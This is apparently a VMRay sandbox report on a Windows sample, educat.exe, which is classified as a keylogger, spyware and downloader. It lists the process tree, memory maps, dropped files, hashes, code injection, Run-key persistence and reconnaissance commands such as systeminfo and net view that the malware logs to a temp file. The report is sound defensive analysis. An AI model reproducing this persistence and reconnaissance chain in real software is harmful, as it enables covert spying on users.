dba40065...3ae4 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Downloader

dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4 (SHA256)

educat.exe

Windows Exe (x86-32)

Created at 2018-11-06 11:23:00

...

Notifications (2/3)

The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.

Code overwrite was observed during this analysis. Note that the analysis results may be affected by this modification by the sample.

The operating system was rebooted during the analysis.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xd50 Analysis Target High (Elevated) educat.exe "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe" -
#2 0xda4 Child Process High (Elevated) educat.exe "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe" #1
#3 0xf40 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"" #2
#5 0xf9c Child Process High (Elevated) cmd.exe cmd /C ""C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"" #3
#6 0xfa8 Child Process High (Elevated) autoclb.exe "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe" #5
#7 0xfb8 Child Process High (Elevated) autoclb.exe "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe" #6
#8 0xfd8 Child Process High (Elevated) svchost.exe C:\Windows\system32\svchost.exe #7
#9 0x5f0 Autostart Medium autoclb.exe "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe" -
#10 0x51c Child Process Medium autoclb.exe "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe" #9
#11 0x198 Child Process Medium svchost.exe C:\Windows\system32\svchost.exe #10
#12 0x834 Injection Medium explorer.exe C:\Windows\Explorer.EXE #11
#13 0xbf0 Child Process Medium cmd.exe cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#15 0x200 Child Process Medium makecab.exe makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin" #12
#17 0xbd0 Child Process Medium systeminfo.exe systeminfo.exe #13
#23 0x198 Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#25 0x978 Child Process Medium cmd.exe cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#27 0x84 Child Process Medium net.exe net view #25
#29 0x86c Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#31 0x420 Child Process Medium cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#33 0x114 Child Process Medium nslookup.exe nslookup 127.0.0.1 #31
#34 0xa1c Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12

Behavior Information - Grouped by Category

Process #1: educat.exe
47 0
»
Information Value
ID #1
File Name c:\users\ciihmnxmn6ps\desktop\educat.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:36, Reason: Analysis Target
Unmonitor End Time: 00:00:49, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
»
Information Value
PID 0xd50
Parent PID 0x508 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x D54
0x D64
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
locale.nls 0x001d0000 0x0028dfff Memory Mapped File r False False False -
private_0x0000000000290000 0x00290000 0x0029ffff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x003f1fff Private Memory rwx True False False -
educat.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
...
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory r True False False -
private_0x00000000006b0000 0x006b0000 0x007affff Private Memory rw True False False -
private_0x00000000007b0000 0x007b0000 0x007cffff Private Memory rw True False False -
private_0x0000000000800000 0x00800000 0x0080ffff Private Memory rw True False False -
pagefile_0x0000000000810000 0x00810000 0x00990fff Pagefile Backed Memory r True False False -
pagefile_0x00000000009a0000 0x009a0000 0x01d9ffff Pagefile Backed Memory r True False False -
private_0x0000000001da0000 0x01da0000 0x01e50fff Private Memory rwx True False False -
private_0x0000000001e60000 0x01e60000 0x01ecefff Private Memory rwx True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory rw True False False -
private_0x0000000001f30000 0x01f30000 0x020a6fff Private Memory rw True False False -
pagefile_0x0000000001f30000 0x01f30000 0x01fa0fff Pagefile Backed Memory rwx True False False -
private_0x0000000001fb0000 0x01fb0000 0x02126fff Private Memory rw True False False -
private_0x00000000020b0000 0x020b0000 0x02228fff Private Memory rw True False False -
private_0x0000000002130000 0x02130000 0x022a8fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
comctl32.dll 0x74b50000 0x74be1fff Memory Mapped File rwx False False False -
version.dll 0x74bf0000 0x74bf7fff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3
Fn
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe os_pid = 0xda4, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread (3)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1
Fn
Set Context c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1
Fn
Resume c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1
Fn
Memory (2)
»
Operation Process Additional Information Success Count Logfile
Read C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Write C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Module (14)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7527a330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75277580 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75279910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7527f400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75278b70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x752874f0 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1
Fn
Map - process_name = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Fn
Map - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f30000 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #2: educat.exe
77 0
»
Information Value
ID #2
File Name c:\users\ciihmnxmn6ps\desktop\educat.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
»
Information Value
PID 0xda4
Parent PID 0xd50 (c:\users\ciihmnxmn6ps\desktop\educat.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x DA8
0x DB0
0x DB4
0x F2C
0x F30
0x F34
0x F38
0x F3C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0012efff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory r True False False -
cversions.2.db 0x00160000 0x00163fff Memory Mapped File r True False False -
cversions.2.db 0x00170000 0x00173fff Memory Mapped File r True False False -
propsys.dll.mui 0x00180000 0x00190fff Memory Mapped File r False False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
locale.nls 0x001e0000 0x0029dfff Memory Mapped File r False False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory rw True False False -
cversions.1.db 0x003f0000 0x003f3fff Memory Mapped File r True False False -
private_0x00000000003f0000 0x003f0000 0x003f3fff Private Memory rw True False False -
educat.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
...
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x0053ffff Private Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db 0x004c0000 0x00502fff Memory Mapped File r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db 0x00510000 0x00522fff Memory Mapped File r True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory rw True False False -
pagefile_0x0000000000540000 0x00540000 0x00540fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000550000 0x00550000 0x00550fff Pagefile Backed Memory rw True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory rw True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x00580000 0x0060afff Memory Mapped File r True False False -
private_0x0000000000630000 0x00630000 0x0072ffff Private Memory rw True False False -
pagefile_0x0000000000730000 0x00730000 0x008b7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008c0000 0x008c0000 0x00a40fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a50000 0x00a50000 0x01e4ffff Pagefile Backed Memory r True False False -
private_0x0000000001e50000 0x01e50000 0x01f4ffff Private Memory rw True False False -
private_0x0000000001f50000 0x01f50000 0x0236ffff Private Memory rw True False False -
sortdefault.nls 0x02370000 0x026a6fff Memory Mapped File r False False False -
private_0x00000000026b0000 0x026b0000 0x026effff Private Memory rw True False False -
private_0x00000000026f0000 0x026f0000 0x027effff Private Memory rw True False False -
private_0x00000000027f0000 0x027f0000 0x0282ffff Private Memory rw True False False -
private_0x0000000002830000 0x02830000 0x0292ffff Private Memory rw True False False -
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory rw True False False -
private_0x0000000002970000 0x02970000 0x02a6ffff Private Memory rw True False False -
private_0x0000000002a70000 0x02a70000 0x02aaffff Private Memory rw True False False -
private_0x0000000002ab0000 0x02ab0000 0x02baffff Private Memory rw True False False -
private_0x0000000002bb0000 0x02bb0000 0x02beffff Private Memory rw True False False -
private_0x0000000002bf0000 0x02bf0000 0x02ceffff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
iertutil.dll 0x745a0000 0x74860fff Memory Mapped File rwx False False False -
urlmon.dll 0x74870000 0x749cffff Memory Mapped File rwx False False False -
propsys.dll 0x749d0000 0x74b11fff Memory Mapped File rwx False False False -
devobj.dll 0x74b20000 0x74b40fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74b90000 0x74bbefff Memory Mapped File rwx False False False -
bcrypt.dll 0x74bc0000 0x74bdafff Memory Mapped File rwx False False False -
cryptsp.dll 0x74be0000 0x74bf2fff Memory Mapped File rwx False False False -
uxtheme.dll 0x74c20000 0x74c94fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75220000 0x75255fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
clbcatq.dll 0x76820000 0x768a1fff Memory Mapped File rwx False False False -
ole32.dll 0x768b0000 0x76999fff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
setupapi.dll 0x76a90000 0x76c34fff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c90000 0x76d21fff Memory Mapped File rwx False False False -
msasn1.dll 0x76d30000 0x76d3dfff Memory Mapped File rwx False False False -
wintrust.dll 0x76d40000 0x76d81fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
crypt32.dll 0x77ab0000 0x77c24fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
private_0x000000007fea4000 0x7fea4000 0x7fea6fff Private Memory rw True False False -
private_0x000000007fea7000 0x7fea7000 0x7fea9fff Private Memory rw True False False -
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory rw True False False -
private_0x000000007fead000 0x7fead000 0x7feaffff Private Memory rw True False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 address = 0x400000, size = 462848 True 1
Fn
Modify Memory #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 address = 0x7ffde008, size = 4 True 1
Fn
Data
Modify Control Flow #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 os_tid = 0xda8, address = 0x77d0aef0 True 1
Fn
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe 820.34 KB MD5: 91b1601970930900983f1b79d2b44fe1
SHA1: c7f04687b7f0550d5e8fae5b3de4d90ddaece0f1
SHA256: dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4
SSDeep: 12288:n9exub3tNiHjyKsaYCgoj34ajQGV3vrkdlNdDkkcKSop:nkuqGDCjPLtvrkJ5tcKZp 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep: 3:: 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat 0.11 KB MD5: 5bde3bfe9842073c900e183ec81c6d15
SHA1: 1be6e4197cf7d451b7174874bb962e95ffb7ed15
SHA256: d09e1f585b0bebabbf056086cec881cf03f2a5d83aeaf52144a025890cc9e886
SSDeep: 3:BeCxK6OWRNfeUR/OvG8JgU64vHXMJATkUE0QefiOvBbn:4CHRhtj87vvHXMJ2dvfien 		False
...
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe 820.34 KB MD5: e0fcc4456524297ae54a4bfb046d2052
SHA1: f09d17a04a615f3454e50f1abf080374a9cff4c9
SHA256: 40bc0bac0af3ffa852bbcc5926d873ca15d6fbd458de40d1ace6de493af2262e
SSDeep: 12288:O9exub3tNiHjyKsaYCgoj34ajQGV3vrkdlNdDkkcKSop:OkuqGDCjPLtvrkJ5tcKZp 		False
...
Host Behavior
File (21)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Fn
Create C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - True 1
Fn
Create Directory C:\Users\CIIHMN~1\AppData\Local\Temp\74EE - True 1
Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\74EE.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1
Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\74EE True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe type = size True 1
Fn
Read C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe size = 840024, size_out = 840024 True 1
Fn
Data
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe size = 4096 True 2
Fn
Data
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe size = 835928 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat size = 110 True 1
Fn
Data
Registry (20)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_USERS - True 1
Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1
Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = 160, type = REG_NONE False 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 118, type = REG_SZ True 1
Fn
Write Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Install, size = 118, type = REG_BINARY True 1
Fn
Data
